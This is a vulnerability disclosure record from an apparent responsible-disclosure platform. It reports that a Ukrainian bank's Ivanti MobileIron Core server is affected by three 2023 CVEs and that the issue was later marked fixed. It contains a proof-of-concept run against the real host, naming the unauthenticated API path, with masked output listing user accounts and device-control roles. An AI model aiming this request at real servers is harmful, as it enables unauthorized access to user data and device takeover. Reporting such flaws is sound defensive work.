- Creation
- Validation
- Communication & fix
- Disclosure
ukrsibbank.com / Ivanti MobileIron core is outdated
Chocapikk
reported 2023-08-03
The following Ivanti MobileIron instance is publicly accessible and looks out-dated :
It is critical to update to a safe version as soon as possible since it could lead to instance and devices takeover. Those vulnerabilities are currently used in ransomware campaign and could damage your network.
Reference:
Proof Of Concept:
$ python exploit.py -u https://mdm.ukrsibbank.com 3:01:05
Fetching data from: https://mdm.ukrsibbank.com/mifs/asfV3/api/v2/autho
rized/users?adminDeviceSpaceId=1
Warning: The site may be vulnerable as a valid JSON was retrieved
successfully.
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RESET_AC_PASSCODE,
ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_RETIRE,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RESET_AC_PASSCODE,
ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_RETIRE,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RESET_AC_PASSCODE,
ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_RETIRE,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.ukrsibbank.com
Roles: ROLE_MPW_LOCK, ROLE_MPW_RETIRE, ROLE_MPW_WIPE, ROLE_MPW_REG,
ROLE_USER_PORTAL_RW, ROLE_MPW_LOCATE, ROLE_MPW_UNLOCK
IP:
195.60.201.11Port:
443Detected protocol:
httpsVulnerable URL:
https://195.60.201.11Found vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35082
Affected by CVE-2023-35078
Affected by CVE-2023-35081
WARNING: This event relies on the version reported by the software and might not account for manual patching of older versions. Please discard if manual RPM patch has been applied.
Found by MobileIronCorePlugin 2023-08-03
Report created by
Chocapikk
2023-08-03
Chocapikk
2023-08-03
Report approved by
BloodyShell
2023-08-03
BloodyShell
2023-08-03
New PDF report generated by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report dispatched to ...@... by system 2023-08-03
Report comment dispatched to BloodyShell by system 2023-08-03
Report comment dispatched to cristi by system 2023-08-03
Report comment dispatched to fokoil by system 2023-08-03
Report edited by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report marked as fixed by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
Report closed by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report edited by
Chocapikk
2023-08-13
Chocapikk
2023-08-13
New PDF report generated by system 2023-08-13
Information
Owner
ukrsibbank.com
Created
2023-08-03 13:05
Updated
2023-08-13 21:58
Fixed
true
Contacts
t...@ukrsibbank.com
m...@ukrsibbank.com
o...@ukrsibbank.com
y...@ukrsibbank.com
d...@ukrsibbank.com
t...@ukrsibbank.com
v...@ukrsibbank.com
v...@ukrsibbank.com
s...@ukrsibbank.com
d...@ukrsibbank.com
Status
Status
closed
Hosting contacted
false
CERT contacted
false
Download report